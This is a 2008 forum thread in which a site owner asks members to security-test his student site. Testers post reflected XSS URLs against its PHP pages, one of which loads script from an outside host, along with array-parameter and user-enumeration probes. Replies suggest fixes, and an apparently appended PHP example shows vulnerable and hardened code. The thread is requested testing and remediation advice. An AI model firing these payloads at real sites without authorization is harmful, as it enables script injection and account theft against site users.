amitava82 Posted February 13, 2008
Can you guys test my site and find any security issues and bugs?
Link: http://iupgbsa.info/
Demo user: demo@iupgbsa.info
Pass: 123456
Thanks!
helraizer Posted February 14, 2008
XSS - http://iupgbsa.info/profile.php?user=%22%3E%3Cmarquee%3E%3Ch1%3Evunerable%3C/h1%3E%3C/marquee%3E
http://iupgbsa.info/profile.php?user=15%22%3E%3Cscript%20src=http://www.helraizer.co.uk/xss1.js%3E%3C/script%3E - need to protect GET variables.
http://iupgbsa.info/profile.php?user=15
Just to name a few
helraizer Posted February 14, 2008
An annoyance, more than a problem, is that during registration you ask for the user's country twice, and yet still ask for a zip code. England, for one, doesn't use zip codes, so how can they possibly be verified?
I've registered now; it may take up to 24 to activate my account, if they'll activate it, that is.
Sam
amitava82 Posted February 14, 2008
Thanks for the suggestions and finding the issues. Registration is only allowed for graduate students. We do manual verification and then activate the account. That's why it takes 24 hours for activation.
Regarding GET protection.. Can you please give me an idea how to do it? I'm just a business student.. Don't have much in-depth knowledge of PHP... Can I use the PHP strip_tags() function to do that?
Any more issues, please let me know. Thank you!
agentsteal Posted February 14, 2008
Array: http://www.iupgbsa.info/profile.php?user[]
Cross Site Scripting: http://www.iupgbsa.info/forgotpassword.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.iupgbsa.info/index.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting: http://www.iupgbsa.info/profile.php?user="><marquee><h1>vulnerable</marquee>
User Enumeration: http://www.iupgbsa.info/~admin
User Enumeration: http://www.iupgbsa.info/~iupgbsa
User Enumeration: http://www.iupgbsa.info/~root
helraizer Posted February 14, 2008
> Thanks for the suggestions and finding the issues. Registration is only allowed for graduate students. We do manual verification and then activate the account. That's why it takes 24 hours for activation.
> Regarding GET protection.. Can you please give me an idea how to do it? I'm just a business student.. Don't have much in-depth knowledge of PHP... Can I use the PHP strip_tags() function to do that?
> Any more issues, please let me know. Thank you!

If you have, say, $user = $_GET['user']; then instead use $user = htmlspecialchars($_GET['user']); - That'll change < or > into &lt; or &gt;, thus rendering xss obsolete.
Sam
amitava82 Posted February 14, 2008
Yes, I figured that out from the PHP manual and made the changes. Thanks for your help though.
Also, I'm receiving all kinds of attack mails in my inbox after posting my site link here. I'm wondering if anyone from here is doing that for testing purposes or if it's just a regular spam attack.. ???
helraizer Posted February 14, 2008
If you have your email openly on your site, unprotected (with @ and . rather than [at] and [dot] or similar), then it could well be a spam bot; else it could well be someone just testing it.
Sam
TheFilmGod Posted February 18, 2008
> Thanks for the suggestions and finding the issues. Registration is only allowed for graduate students. We do manual verification and then activate the account. That's why it takes 24 hours for activation.
> Regarding GET protection.. Can you please give me an idea how to do it? I'm just a business student.. Don't have much in-depth knowledge of PHP... Can I use the PHP strip_tags() function to do that?
> Any more issues, please let me know. Thank you!

> If you have, say, $user = $_GET['user']; then instead use $user = htmlspecialchars($_GET['user']); - That'll change < or > into &lt; or &gt;, thus rendering xss obsolete.
> Sam

Use $_SESSION instead of $_GET. GET should only be used to keep track of a page URL or for a search - don't use it for info related to usernames.
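The three fixes raised in this thread (reject the ?user[] array case from agentsteal's post, escape output with htmlspecialchars() as helraizer suggests, and take the logged-in identity from $_SESSION rather than the query string as TheFilmGod suggests) put together in one added example. This is illustrative code written for this thread, not the site's own profile.php; it assumes the page takes a numeric ?user= id and echoes it back into an input field.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern (the shape the testers hit): the raw query value is
// concatenated into HTML, so ?user="><script>... becomes live markup.
function render_profile_vulnerable(array $get): string
{
    $user = $get['user'] ?? '';
    return '<input type="text" name="user" value="' . $user . '">';
}

// Validation step: a user id must be a scalar string of digits. A ?user[]
// request arrives as an array, which string functions warn on, so reject it.
function validate_user_id($raw): ?int
{
    if (!is_string($raw) || $raw === '' || !ctype_digit($raw)) {
        return null;
    }
    return (int) $raw;
}

// Output-escaping step: ENT_QUOTES also encodes " and ', which matters
// because the value sits inside a quoted attribute; charset is explicit.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: validate, escape, and trust the session for "who am I".
function render_profile_hardened(array $get, array $session): string
{
    $id = validate_user_id($get['user'] ?? null);
    if ($id === null) {
        return '<p>Invalid user id.</p>';
    }
    // The visitor's own identity comes from $_SESSION (set at login), never
    // from the URL; the GET id only selects which public profile to show.
    $self = isset($session['user_id']) && (int) $session['user_id'] === $id;
    $label = $self ? 'Your profile' : 'Profile #' . e((string) $id);
    return '<h1>' . $label . '</h1>'
         . '<input type="text" name="user" value="' . e((string) $id) . '">';
}

// Constructed inputs of the same shape as the ones posted in the thread.
$xss   = ['user' => '"><marquee><h1>vulnerable</h1></marquee>'];
$array = ['user' => []];
echo render_profile_vulnerable($xss), PHP_EOL;            // markup injected
echo render_profile_hardened($xss, []), PHP_EOL;          // rejected
echo render_profile_hardened($array, []), PHP_EOL;        // rejected
echo render_profile_hardened(['user' => '15'], ['user_id' => 15]), PHP_EOL;
```

Run it with the PHP CLI to compare the first output line (raw markup) against the escaped and rejected cases that follow.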